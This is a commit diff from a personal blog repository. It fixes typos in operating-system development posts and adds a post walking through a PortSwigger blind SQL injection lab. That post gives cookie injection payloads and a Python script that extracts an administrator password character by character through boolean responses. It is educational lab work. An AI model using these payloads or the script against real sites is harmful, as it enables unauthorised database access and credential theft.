Compare commits

...

2 Commits

Author SHA1 Message Date
Drew Galbraith 80e734855c Fix spelling errors in first posts (yikes). 2024-01-23 23:14:03 -08:00
Drew Galbraith adeb3cf394 Blind SQL Injection Post 2024-01-23 23:08:02 -08:00
3 changed files with 243 additions and 17 deletions

View File

@ -111,13 +111,14 @@ On top of the things mentioned above, we use the limine protocol to:
Following boot we immediately initialize the global descriptor table (GDT) and
interrupt descriptor table (IDT). The **GDT** is mostly irrelevant for x86-64,
however it was interesting trying to get it to work with the sysret function
which expects two copies of the user-space segment descriptors to allow returing
to 32bit code from a 64 bit OS. Right now the system doesn't support 32 bit code
(and likely never will) so we just duplicate the 64 bit code segment.
which expects two copies of the user-space segment descriptors to allow
returning to 32bit code from a 64 bit OS. Right now the system doesn't support
32 bit code (and likely never will) so we just duplicate the 64 bit code
segment.
The **IDT** is fairly straightforward and barebones for now. I slowly add more
debugging information to faults as I run into them and it is useful. One of the
biggest improvements was setting up a seperate kernel stack for Page Faults and
biggest improvements was setting up a separate kernel stack for Page Faults and
General Protection Faults. That way if I broke memory related to the current
stack frame I get useful debugging information rather than an immediate triple
fault. I also recently added some very sloppy stack unwind code so I can more
@ -153,9 +154,9 @@ earlier than they need to be it is obvious because things break.
For **virtual memory management** I keep the higher half (kernel) mappings
identical in each address space. Most of the kernel mappings are already
availble from the bootloader but some are added for heaps and additional stacks.
available from the bootloader but some are added for heaps and additional stacks.
For user memory we maintain a tree of the mapped in objects to ensure that none
intersect. Right now the tree is innefficient because it doesn't self balance
intersect. Right now the tree is inefficient because it doesn't self balance
and most objects are inserted in ascending order (i.e. it is essentially a
linked list).
@ -213,7 +214,7 @@ The kernel provides APIs to:
* Allocate memory and map it into an address space.
* Communicate with other processes using Endpoints, Ports, and Channels.
* Register IRQ handlers.
* Manage Capabilites.
* Manage Capabilities.
* Print debug information to the VM output.
### IPC

View File

@ -110,7 +110,7 @@ The short story is that we are looking for the device with the right [class
code](https://wiki.osdev.org/PCI#Class_Codes) - Class Code 0x1 (Storage Device),
Subclass 0x6 (SATA Controller), Subtype 0x1 (AHCI).
Once we have the correct configuration space we cn read the address at offset
Once we have the correct configuration space we can read the address at offset
0x24 (called the ABAR for AHCI Base Address) which points to the start of the
GHC registers.
@ -319,7 +319,7 @@ type and any errors from the interrupt since we aren't sending any commands.
Something I'm not sure about is that as soon as we enable interrupts we seem to
receive a FIS from the device with an error bit set. Both the hard drive and the
optical drive on qemu send a FIS with error bit 0x1 set. Additionally the status
optical drive on QEMU send a FIS with error bit 0x1 set. Additionally the status
field is set to 0x30 for the hard drive and 0x70 for the optical drive.
I was able to find a [OSDev Forum
@ -328,7 +328,7 @@ referencing that this behavior is caused by the reset sending an EXECUTE DEVICE
DIAGNOSTIC command (0x90) to the device. It notes that this is largely
undocumented behavior but at least this information offers some clarity on the
outputs. Reading the ATA Command Set section 7.9.4 we can see that the command
ouputs code 0x01 to the error bits when `Device 0 passed, Device 1 passed or not
outputs code 0x01 to the error bits when `Device 0 passed, Device 1 passed or not
present`. According a footnote we can "See the appropriate transport standard
for the definition of device 0 and device 1." I really thought I was already
looking at the "appropriate transport standard" but alas. All that to say we'll
@ -340,7 +340,7 @@ Now that the AHCI ports are initialized and can handle an interrupt, we can send
commands to them. To start with lets send the IDENTIFY DEVICE command to each
device. This command asks the device to send 512 bytes of information about
itself back to us. These bytes contain 40 years of certified-crufty backwards
compatability. I mean just feast your eyes on the number of retired and obsolete
compatibility. I mean just feast your eyes on the number of retired and obsolete
fields in just the first page of the spec.
![IDENTIFY DEVICE Response](images/IDENTIFY_DEVICE.png)
@ -350,7 +350,7 @@ and sector count from the drive. To do so we need to figure out how to send a
command to the device. To be honest I feel like the specs fall down here in
actually explaining this. The trick is to send a Register Host to Device FIS in one
of the command slots. This FIS type has a field for the command as well as some
common parameters such as lba and count. In retrospect it is fairly clear once
common parameters such as LBA and count. In retrospect it is fairly clear once
you are aware of it, but if you are just reading the SATA spec and looking at
the possible commands, making the logical jump to the Register Host To Device
FIS feels damn near impossible.
@ -379,7 +379,7 @@ Device FIS is as follows:
![Register Host to Device FIS Layout](images/RegisterHostToDeviceFIS.png)
We don't need to initialize most of the fields here because the IDENTIFY_DEVICE
call doesn't rely on an lba or sector count. One of the keys is setting the high
call doesn't rely on an LBA or sector count. One of the keys is setting the high
bit "C" in the byte that contains PM Port which indicates to the HBA that this
FIS contains a new command (I spent a while trying to figure out why this wasn't
working without that). The code for this is relatively straightforward.
@ -429,9 +429,9 @@ port_struct_->command_issue |= (1 << slot);
```
But wait! How will we know when this command has completed? We somehow need to
wait until we receive an interrupt for this command to proccess the data it
wait until we receive an interrupt for this command to process the data it
sent. To handle this we can add a semaphore for each port command slot to allow
signalling when we recieve a completion interrupt for that command. I think it
signalling when we receive a completion interrupt for that command. I think it
might make sense to have some sort of callback instead so we can pass errors
back to the caller instead of just a completion signal. However I'm not sure
what type of errors exist that are resolvable by the caller so for now this
@ -469,7 +469,7 @@ void AhciPort::HandleIrq() {
}
```
Ok now that we have retrieved the information from the drive we can parse it.
OK now that we have retrieved the information from the drive we can parse it.
For the sector size, the default is 512 bytes which we will use unless the
`LOGICAL SECTOR SIZE SUPPORTED` bit is set in double word 106, bit 12. If that
is set we can check the double words at 117 and 118 to get the 32 bit sector
@ -531,7 +531,7 @@ that truly only a mother could love:
![Register Host to Device Layout LBA](images/RegisterHostToDeviceFISLBA.png)
That asside we simply update the FIS construction to set the command, LBA, and
That aside we simply update the FIS construction to set the command, LBA, and
sector count. Following that we set the PRDT values (although we still only use
one slot).

View File

@ -0,0 +1,225 @@
---
title: "Automating Blind SQL Injection on Cookies"
date: 2024-01-23
---
Earlier this evening, I was working through one of the [PortSwigger SQL
injection
labs](https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses)
which requires you to determine an administrator password by injecting some SQL
into a cookie and checking if the content of the page changes because a
resulting query succeeded or failed.
## The attack
Basically say you have a cookie `TrackingId` with a value like
`nCoQWoq8E7c6vj1e` and the page runs a query like `SELECT ... FROM trackers
WHERE id = 'nCoQWoq8E7c6vj1o'` and inserts a "Welcome Back" banner onto the page
if the query succeeds and doesn't if it fails.
This means you can get creative with the value of the cookie to do some SQL
injection and use the boolean output (either the banner displays or it doesn't)
to extract information.
To validate that there is a SQL injection path available you can try the
following two values for the cookie:
```markdown
nCoQWoq8E7c6vj1o' AND '1'='1
nCoQWoq8E7c6vj1o' AND '1'='0
```
This transforms the query from something like this:
```sql
SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o';
```
Into your modified query:
```sql
SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o' AND '1'='0';
```
Now this might not seem very useful off the bat but you can extract a lot of
information out of the database this way. Consider the following query.
```sql
SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o' AND
(SELECT password FROM users WHERE username = 'administrator') = 'hunter2';
```
Now if the "Welcome Back" banner displayed on the site you would know that you
had properly guessed the admin password because the condition evaluated to true.
Now this isn't any more helpful than just trying to brute force the password on
the login page (other than maybe just bypassing some rate-limits and monitoring).
But what you can do to speed this up is to try to guess each letter at a time,
and you can bifurcate while you're at it. Consider the following three queries
(borrowed directly from the [PortSwigger
tutorial](https://portswigger.net/web-security/sql-injection/blind)).
```sql
-- This succeeds
SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o' AND SUBSTRING(
(SELECT password FROM users WHERE username = 'administrator'), 1, 1) >= 'm';
-- This fails
SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o' AND SUBSTRING(
(SELECT password FROM users WHERE username = 'administrator'), 1, 1) >= 't';
-- This succeeds
SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o' AND SUBSTRING(
(SELECT password FROM users WHERE username = 'administrator'), 1, 1) = 's';
```
We now know the first letter of the administrator password is 's'!
Looking directly at the cookie values they were as follows:
```markdown
nCoQWoq8E7c6vj1o' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 1, 1) >= 'm
nCoQWoq8E7c6vj1o' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 1, 1) >= 't
nCoQWoq8E7c6vj1o' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 1, 1) = 's
```
This is a pretty nifty attack that lets us systematically derive the
administrators password.
## The Problem
Happily, I got to work on the lab and started bifurcating each letter of the
administrator's password. The issue was by the time I got done doing this for 5
letters in the password I was desperately hoping it was only 5 characters long.
I had the same thoughts 8 characters, 10 characters, and 16 characters. This
process was incredibly tedious and involved refreshing the page, updating the
cookie info based on what I had just learned, saving the cookie, and refreshing
the page again.
Obviously there had to be a better way, but because I kept feeling like I was
just around the corner from cracking it I ended up powering through all 20
characters of the password. 20! This took me well over 30 minutes I think.
Clearly, this sort of repetitive work is something that should be automated.
## The Solution
So let's take a crack at this using the python requests library (mainly because
it is the one I've used in the past). Let's start by simply getting the page as
is:
```python
import requests
url = "https://{SOME_HEX_ID}.web-security-academy.net/"
r = requests.get(url)
print(r.status_code)
print(r.text)
```
And viola it works! At least we don't have to pretend we're a browser or
something to get the page properly. Next up lets try to get the "Welcome Back!"
banner.
```python
cookies = {
"TrackingId": "CjAZljYSS9X1ZfRg",
}
r = requests.get(url, cookies=cookies)
```
Incredibly this also works on the first try! Now let's generalize this into a
function that tells us whether a specific cookie gets a good response or not.
```python
def injection_works(inject_str):
url = "https://0a0400cc04bd096f82089e9e005900a9.web-security-academy.net/"
cookies = {
"TrackingId": f"CjAZljYSS9X1ZfRg{inject_str}",
}
r = requests.get(url, cookies=cookies)
if r.status_code != 200:
print(r.status_code)
print(r.text)
sys.exit("Request failed")
return "Welcome back!" in r.text
if __name__ == "__main__":
print(injection_works(""))
```
For the purposes of this we can just match the exact string in the response
text, we don't need to actually parse it using beautiful soup or something.
Now we can use this function to bisect the first character like so:
```python
def determine_character(char_num):
base_inj_str = "' AND SUBSTRING("
"(SELECT password FROM users WHERE username = 'administrator'), {}, 1) < '{}"
# There has got to be a cleaner way to do this right?
base_charset = "0123456789abcdefghijklmnopqrstuvxyz"
charset = base_charset[:]
while len(charset) > 1:
mid_char_num = int(len(charset) / 2)
mid_char = charset[mid_char_num]
inj_str = base_inj_str.format(char_num, mid_char)
if injection_works(inj_str):
# The character is less than our midpoint.
charset = charset[:mid_char_num]
else:
# The character is greater than or equal to our midpoint.
charset = charset[mid_char_num:]
time.sleep(1)
print(charset)
return charset[0]
if __name__ == "__main__":
print(determine_character(1))
```
This successfully identifies the first character in the administrator password as
'1'.
Finally we just need to do this iteratively until we reach the end of the
password. While doing this manually I learned that when you take a substring
outside of a strings length in MySQL it just returns an empty string. Lets add a
case to detect that before trying to bifurcate a character, because as I
learned annoyingly the first time around, the empty string will always compare
as less than a single character. We can use that to our advantage however and
simply test that whether the string is less than a character we know we won't
see (as we know the password is lowercase alphanumeric) like the '!'.
```python
def determine_character(char_num):
base_inj_str = "' AND SUBSTRING("
"(SELECT password FROM users WHERE username = 'administrator'), {}, 1) < '{}"
base_charset = "0123456789abcdefghijklmnopqrstuvxyz"
if injection_works(base_inj_str.format(char_num, '!')):
return None
...
```
Then in the main function we can use an [assignment
expression](https://peps.python.org/pep-0572/) to loop until the function
returns None.
```python
if __name__ == "__main__":
char_num = 1
password = ""
while char := determine_character(char_num):
password += char
char_num += 1
print(password)
```
And this worked on the first try! It got the password in around 3 minutes
(mainly hampered by the slow response time of the server but I didn't want to
hammer the kind people at PortSwagger by parallelizing this). And all told this
took me just over 50 minutes to write (including this blog post though). And
while that was slightly longer than the time it took me to do this manually it
was wayyyy less tedious and it's repeatable!
Overall, I found this very enjoyable as I have played with SQL injections in the
past but I haven't tried to automate anything around it and this was a cool
opportunity to do that.